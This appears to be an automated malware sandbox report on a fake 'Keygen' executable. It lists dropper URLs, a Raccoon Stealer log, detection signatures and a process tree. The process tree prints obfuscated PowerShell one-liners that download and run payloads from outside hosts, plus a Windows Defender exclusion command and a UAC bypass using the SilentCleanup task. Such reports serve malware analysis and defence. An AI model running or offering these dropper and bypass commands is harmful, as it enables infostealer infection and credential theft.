Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    151s
  • max time network
    166s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (72) — копия.exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 01:40:06 GMT Bot_ID: BAE8C589-5DA1-4C62-BE46-F8D74908CB8C_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.51 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: AVGLFESB - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (514 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 3 IoCs
  • ModiLoader Second Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 23 IoCs
  • Loads dropped DLL 49 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (72) — копия.exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (72) — копия.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1044
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\36AA.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (72) — ?????.exe""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:308
      • C:\Users\Admin\AppData\Local\Temp\36AA.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:532
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\36AA.tmp\m.hta"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1548
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1584
          • C:\Users\Public\fjo.exe
            "C:\Users\Public\fjo.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2580
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2664
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:2780
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 2780 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\409246581280038\\* & exit
                  8⤵
                    PID:960
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 2780
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2220
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2684
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2756
              • C:\Users\Public\fjo.exe
                "C:\Users\Public\fjo.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops desktop.ini file(s)
                • Modifies system certificate store
                PID:2736
                • C:\Users\Admin\AppData\Local\Temp\qbyhBnpv2D.exe
                  "C:\Users\Admin\AppData\Local\Temp\qbyhBnpv2D.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2016
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                    "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\qbyhBnpv2D.exe"'
                    8⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2520
                • C:\Users\Admin\AppData\Local\Temp\uj1q6nONt1.exe
                  "C:\Users\Admin\AppData\Local\Temp\uj1q6nONt1.exe"
                  7⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  PID:2712
                  • C:\Windows\SysWOW64\Notepad.exe
                    "C:\Windows\System32\Notepad.exe"
                    8⤵
                      PID:2220
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c C:\Users\Public\Natso.bat
                        9⤵
                          PID:2276
                          • C:\Windows\SysWOW64\reg.exe
                            reg delete hkcu\Environment /v windir /f
                            10⤵
                            • Modifies registry key
                            PID:2052
                          • C:\Windows\SysWOW64\reg.exe
                            reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
                            10⤵
                            • Modifies registry key
                            PID:1180
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
                            10⤵
                              PID:2544
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c C:\Users\Public\Natso.bat
                            9⤵
                              PID:1756
                          • C:\Program Files (x86)\internet explorer\ieinstal.exe
                            "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                            8⤵
                              PID:1780
                          • C:\Users\Admin\AppData\Local\Temp\0tSvXRYXPm.exe
                            "C:\Users\Admin\AppData\Local\Temp\0tSvXRYXPm.exe"
                            7⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of SetWindowsHookEx
                            PID:296
                            • \??\c:\windows\SysWOW64\cmstp.exe
                              "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\vfuukxkm.inf
                              8⤵
                                PID:524
                            • C:\Users\Admin\AppData\Local\Temp\6JiIhxc6bK.exe
                              "C:\Users\Admin\AppData\Local\Temp\6JiIhxc6bK.exe"
                              7⤵
                              • Executes dropped EXE
                              • Windows security modification
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1576
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                "powershell" Get-MpPreference -verbose
                                8⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1932
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\fjo.exe"
                              7⤵
                                PID:1748
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /T 10 /NOBREAK
                                  8⤵
                                  • Delays execution with timeout.exe
                                  PID:3032
                      • C:\Windows\SysWOW64\mshta.exe
                        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\36AA.tmp\m1.hta"
                        3⤵
                        • Modifies Internet Explorer settings
                        • Suspicious use of WriteProcessMemory
                        PID:1676
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                          4⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1644
                      • C:\Windows\SysWOW64\timeout.exe
                        timeout 1
                        3⤵
                        • Delays execution with timeout.exe
                        PID:1796
                      • C:\Windows\SysWOW64\mshta.exe
                        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\36AA.tmp\b.hta"
                        3⤵
                        • Modifies Internet Explorer settings
                        • Suspicious use of WriteProcessMemory
